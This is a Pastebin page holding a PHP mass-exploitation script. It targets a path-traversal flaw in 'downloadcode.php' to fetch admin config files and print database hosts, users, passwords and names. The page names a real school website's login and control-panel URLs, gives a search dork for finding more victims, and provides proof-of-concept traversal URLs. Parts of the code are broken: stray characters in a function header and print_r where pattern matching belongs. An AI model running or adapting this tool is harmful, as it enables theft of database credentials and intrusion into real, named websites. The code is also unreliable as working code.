Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- set_time_limit(0);
- // Info ....
- $Info2 = "- Coded By Mister Klio @Fb.com/IzzAdiine [AZedinekyo@Gmail.com]";
- $Info3 = "- Dork : inurl:/downloadcode.php=";
- $Info4 = "- Login : http://www.stteresaschool.in/admin/login.php";
- $Info5 = "- Cpanel : http://www.stteresaschool.in/controlpanel/ ";
- /*
- // Login .....
- - Read Login : http://www.stteresaschool.in/downloadcode.php?d=../admin/login.php
- // Poc ....
- - Get Config : http://www.stteresaschool.in/downloadcode.php?d=../admin/config.php
- // Usage ....
- - Usage >php Script.php Liste.txt
- */
- if(!file_exists($argv[1])){
- echo "\n\t - usage : php $argv[0] Liste.txt \n";
- echo "\n $Info2 \n $Info3 \n $Info4 \n $Info5 \n ";
- }
- /// downloadcode.php
- $Files=file_get_contents($argv[1]);
- $explode=explode("\r\n",$Files);
- echo "\t - Total :".count($explode)."\n\n";
- foreach ($explode as $Target){
- echo " \t - Scaning ..... : $Target \n";
- echo " \t - Please Wait.... \n\n\n";
- $Get=@file_get_contents($Target);
- if(eregi("/downloadcode.php",$Get)){
- $downloadcode1=( $Target).("/downloadcode.php?d=../admin/config.php"); /// Vuln : d=../admin/
- getinfo( $downloadcode1);
- }
- else {
- echo "- Erur Not Vuln \n\n";}
- }
- //// function Info Get
- function getinfo($Url){859*-
- $Inject = curl_init();
- curl_setopt($Inject, CURLOPT_URL, "$Url");
- curl_setopt($Inject, CURLOPT_RETURNTRANSFER, 1);
- $Database= curl_exec($Inject);
- curl_close($Inject);
- if(print_r ("#require_once\(ABSPATH . 'config.php'\);#i", $Database)){
- if (print_r ("#define\('db_host', '(.*?)'\);#i", $Database, $Done))
- {
- echo "\t - db_host : ", $Done[1], "\n";
- }if (print_r ("#define\('db_user', '(.*?)'\);#i", $Database, $Done))
- {
- echo "\t - db_user : ", $Done[1], "\n";
- }if (print_r ("#define\('db_password', '(.*?)'\);#i", $Database, $Done))
- {
- echo "\t - db_password : ", $Done[1], "\n";
- }if (print_r ("#define\('db_name', '(.*?)'\);#i", $Database, $Done))
- {
- echo "\t - db_name : ", $Done[1], "\n\n";
- echo $Info4 ;
- }
- }else{
- echo "- Target Not Work "."\n\n";
- }
- }
- ?>
Add Comment
Please, Sign In to add comment